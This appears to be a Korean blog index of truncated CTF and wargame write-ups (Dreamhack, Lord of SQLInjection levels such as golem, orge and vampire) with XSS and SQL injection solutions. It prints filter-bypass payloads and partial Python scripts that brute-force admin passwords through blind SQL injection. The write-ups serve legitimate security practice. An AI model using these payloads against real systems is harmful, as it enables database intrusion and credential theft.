Roronoa

문제 풀이웹 페이지 접근 후 Create a new page 버튼 클릭 Title 입력 부분에 XSS 공격 구문 삽입 후 Create 버튼 클릭 Create 후 메인 페이지 접근 시 Flag 노출 생성한 페이지 접근 시 index가 10인 것을 확인할 수 있음 게시글 수정 페이지 접근 게시글 인덱스인 10뒤에 '(싱글 쿼터) 삽입하여 SQL 반응 확인하였더니 FLAG 노출 페이지 인덱스가 10으로 생성되었기 때문에 3~9까지의 게시글이 존재할 것이라고 판단함, 게시글 3번 페이지 미존재 게시글 7번 수정 페이지 접근 시 Private Page 확인 가능게시글 Content 부분에 XSS 공격 구문 삽입 저장 후 페이지 소스코드 보기에서 flag 속성에 FLAG 존재소감해당 문제는 웹 해킹 초보자들이 처음..

문제 풀이ord() 함수는 UTF-8 바이트를 왼쪽부터 최대 3바이트까지 정수로 해석한 값으로 한글을 테스트한 결과는 아래와 같다.해당 python 코드로 ord 결과 확인 가능a = '가'b = '힣'c = "a"d = "A"print(int.from_bytes(a.encode('UTF-8'), 'big'))print(int.from_bytes(b.encode('UTF-8'), 'big'))print(int.from_bytes(c.encode('UTF-8'), 'big'))print(int.from_bytes(d.encode('UTF-8'), 'big')) int → UTF-8 바이트 → 문자(char)로 변환하는 코드는 아래와 같다.a = 15380608b = 15572643c = 97d = 65pr..

POC'||(uid=0x61646d696e)&&(ascii(substr(upw,1,1))>1#이런식으로 WAF 우회 가능import requestsurl = "http://host8.dreamhack.games:22057"def len_check(): for i in range(1, 100): params = { "uid":f"'||(uid=0x61646d696e)&&(length(upw)={i})#" } response = requests.get(url=url, params=params) if "admin" in response.text: print(f"length: {i}") return..

문제 풀이싱글 쿼터 삽입 시 500에러 발생, SQL 인젝션 포인트 union sql injection을 통해 sqlite3 사용 중임을 확인할 수 있다. union sql injection을 통해 FLAG 획득

This lab contains a SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out a SQL query like the following SELECT * FROM products WHERE category = 'Gifts' AND released = 1 To solve the lab, perform a SQL injection attack that causes the application to display details of all products in any category, both released and unreleased. T..

문제 정보 문제 이름 : GOLEM 문제 설명 or, and, substr(, = 등이 필터링 되어있다. substr()함수 대신 substring()함수나 mid()함를 사용하여 문제를 해결할 수 있다. admin의 pw값을 구하면 문제를 해결할 수 있다. import requests url = 'https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php' cookies={'PHPSESSID':'세션값'} password = '' # # password length 파악 # for length in range(1,20): # params = {'pw':f"' || id like 'admin' && length(pw) like {leng..

문제 정보 문제 이름 : skeleton 문제 설명 이 문제는 쿼리 뒤에 and 1=0이 추가가 되었다. 딱보니 연산자 우선순위 문제 인것같다. php에서 and연산이 or연산보다 먼저 수행된다. pw에 아래의 값을 넣으면 문제를 해결할 수 있다. ' or id ='admin' or '1'='1 이 값을 넣으면 select id from prob_skeleton where id='guest' and pw='' or id ='admin' or '1'='1' and 1=0 이와 같이 된다. 1. select id from prob_skeleton where id='guest' and pw='' or id ='admin' or '1'='1' and 1=0 빨간색 부분이 false가 된다. 2. select i..

문제 정보 문제 이름 : vampire 문제 설명 이번 문제는 str_replace() 함수로 admin을 ""으로 변경한다. aadmindmin이라는 값을 넣으면 aadmindmin에서 admin이 ""으로 대체되어 a""dmin인 admin을 리턴한다. 따라서 id 파라미터 값에 aadmindmin을 넣으면 문제를 해결할 수 있다. payload는 다음과 같다. ?id=aadmindmin

문제 정보 문제 이름 : troll 문제 설명 admin을 필터링 하고 있다. 하지만 i옵션을 주지 않아서 대소문자를 구분하지 않는다. 테이블을 생성할 때 VARCHAR로 생성하면 대소문자를 구분하지않아 where절에서 id 파라미터 값을 대소문자의 관계없이 출력한다. 그래서 Admin이라는 값을 넣었더니 문제를 해결하였다. 데이터베이스에서 VARCHAR로 컬럼을 생성한 것 같다.

문제 정보 문제 이름 : orge 문제 설명 or 과 and가 대소문과 상관없이 필터링되었다. ||과 &&(%26)으로 우회가 가능하다. 그리고 우리가 입력한 pw와 result의 pw가 같아야지 문제를 해결할 수 있다. import requests url = 'https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php' cookies={'PHPSESSID':'세션값'} password = '' # # password length 파악 # for length in range(1,20): # params = {'pw':f"' || id='admin' && length(pw) = {length} #"} # req = requests.get(u..